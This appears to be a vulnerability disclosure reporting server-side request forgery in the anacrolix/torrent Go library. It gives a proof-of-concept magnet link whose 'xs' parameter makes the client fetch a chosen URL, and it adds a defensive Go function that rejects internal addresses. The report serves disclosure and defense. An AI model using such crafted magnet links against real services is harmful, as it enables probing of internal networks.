Server-Side Request Forgery (SSRF) in anacrolix/torrent

Valid
Reported on May 24th 2021

✍️ Description

I have confirmed an SSRF vulnerability in `anacrolix/torrent`.

🕵️‍♂️ Proof of Concept

  1. Open a port over localhost (`python3 -m http.server 5000`)
  2. Run this command: `torrent download 'magnet:?xt=urn:btih:08ada5a7a6183aae1e09d831df6748d566095a10&dn=Sintel&xs=http://localhost:5000'`

*Now you will see in the HTTP logs that a GET request was received.*

💥 Impact

This could be exploited if the user copies a malicious magnet link for downloading through anacrolix/torrent, or if there is a web server that takes a user-supplied magnet URL for downloading files with anacrolix/torrent.
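
For the web server case, one mitigation is to vet the magnet link before it reaches the client. The following is an added example, not part of the original report or of anacrolix/torrent: `CheckMagnet` and its injectable `lookup` resolver are hypothetical names, and the check is extended beyond the `xs` parameter used above to the other URL-bearing magnet parameters (`as`, `ws`, `tr`).

```go
package main

import (
	"fmt"
	"net"
	"net/url"
)

// Magnet parameters that carry URLs a client may contact (xs is the one in the report).
var urlParams = []string{"xs", "as", "ws", "tr"}

// internal reports whether ip is loopback, private, link-local or unspecified.
func internal(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() || ip.IsUnspecified()
}

// CheckMagnet (hypothetical helper) rejects magnet links whose URLs point at internal hosts.
func CheckMagnet(magnet string, lookup func(string) ([]net.IP, error)) error {
	u, err := url.Parse(magnet)
	if err != nil || u.Scheme != "magnet" {
		return fmt.Errorf("not a magnet link")
	}
	for _, p := range urlParams {
		for _, raw := range u.Query()[p] {
			t, err := url.Parse(raw)
			if err != nil || t.Hostname() == "" {
				return fmt.Errorf("%s: no usable host in %q", p, raw) // fail closed
			}
			h := t.Hostname()
			ips := []net.IP{net.ParseIP(h)}
			if ips[0] == nil { // a name, not an IP literal: resolve it
				if ips, err = lookup(h); err != nil || len(ips) == 0 {
					return fmt.Errorf("%s: cannot resolve %q", p, h)
				}
			}
			for _, ip := range ips {
				if internal(ip) {
					return fmt.Errorf("%s: %q points at internal address %s", p, raw, ip)
				}
			}
		}
	}
	return nil
}

func main() {
	poc := "magnet:?xt=urn:btih:08ada5a7a6183aae1e09d831df6748d566095a10&dn=Sintel&xs=http://localhost:5000"
	fmt.Println(CheckMagnet(poc, net.LookupIP)) // the link from the proof of concept
}
```

A pre-flight check like this does not cover HTTP redirects or a name that resolves differently at fetch time, so the same address test should also be enforced where the connection is made (for example in a `net.Dialer` `Control` hook).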

References

https://github.com/assetnote/blind-ssrf-chains

https://portswigger.net/web-security/ssrf/blind